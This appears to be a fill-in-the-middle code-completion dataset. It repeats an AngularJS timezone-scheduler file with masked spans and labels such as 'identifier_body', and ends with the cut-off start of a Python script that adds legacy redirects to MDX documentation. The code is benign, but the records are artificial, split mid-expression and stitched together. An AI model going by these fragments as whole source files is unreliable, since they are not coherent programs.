var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) {
localChange = false;
return;
}
elm.typeahead('setQuery', newVal || '');
}, true);
scope.$on('$destroy', function() {
elm.typeahead('destroy');
});
}
};
});
})();
| {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
} | identifier_body |
app.js | 'use struct';
/* global moment */
var timesched = angular
.module('timesched', ['ui.bootstrap', 'ui.sortable', 'ui.slider'])
.config(function($locationProvider) {
$locationProvider.html5Mode(true);
});
(function() {
var SELECTABLES = [];
var SELECTABLES_BY_NAME = {};
var SELECTABLES_BY_KEY = {};
function normalizeZoneName(zoneName) {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
}
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
var m;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) |
elm.typeahead('setQuery', newVal || '');
}, true);
scope.$on('$destroy', function() {
elm.typeahead('destroy');
});
}
};
});
})();
| {
localChange = false;
return;
} | conditional_block |
app.js | 'use struct';
/* global moment */
var timesched = angular
.module('timesched', ['ui.bootstrap', 'ui.sortable', 'ui.slider'])
.config(function($locationProvider) {
$locationProvider.html5Mode(true);
});
(function() {
var SELECTABLES = [];
var SELECTABLES_BY_NAME = {};
var SELECTABLES_BY_KEY = {};
function | (zoneName) {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
}
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
var m;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) {
localChange = false;
return;
}
elm.typeahead('setQuery', newVal || '');
}, true);
scope.$on('$destroy', function() {
elm.typeahead('destroy');
});
}
};
});
})();
| normalizeZoneName | identifier_name |
add_legacy_redirects.py | import fileinput
import re
import json
import os
from collections import defaultdict
from pathlib import Path
# This script is still very much a work in progress.
# It does a pretty good job matching "new" style urls using a combination of
# scraped Docs 1.0 site data, and the legacy_redirects_metadata.json file.
# "Old" style urls have had initial work done to map them, but since
# we don't currently have any docs live that used "old" style urls,
# this code is commented out until it's needed (and will need to be developed further)
ANSI_STOP = '\033[0m'
ANSI_BOLD = '\033[1m'
ANSI_BLUE = '\033[34m'
ANSI_GREEN = '\033[32m'
ANSI_YELLOW = '\033[33m'
ANSI_RED = '\033[31m'
NEW_URLS_REMOVED_FILES = ['genindex', 'introduction', 'conclusion', 'whats_new']
OLD_URLS_REMOVED_FILES = ['toc']
def determine_url_scheme(url):
if re.search(r'\.\d+\.html', url) or 'toc.html' in url:
return 'old'
else:
return 'new'
def add_urls_to_output(url, path, output):
output[str(path)].append(url);
def write_redirects_to_mdx_files(output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = [] | headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
